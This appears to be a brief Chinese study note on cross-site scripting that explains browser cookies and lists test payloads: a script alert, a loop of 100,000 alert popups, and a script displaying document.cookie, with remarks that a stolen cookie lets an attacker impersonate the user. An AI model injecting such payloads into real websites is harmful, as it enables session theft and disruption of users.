0x01:用户的cookie
1.cookie:在浏览器端存储用户身份信息的一种机制
2.用户信息包含:用户名和密码(经过加密处理保存在cookie里)
0x02:检测实例1
1.检测1:
<script>alert('hack u')</script> //检测
2.检测2:
<script>for(var i=0;i<100000;i++){alert('hack u');}</script> //检测
3.显示用户的cookie:
<script>alert(document.cookie)</script> //此处并没有反弹用户名密码
//非法用户获取cookie后,就可以冒充你的什么登陆系统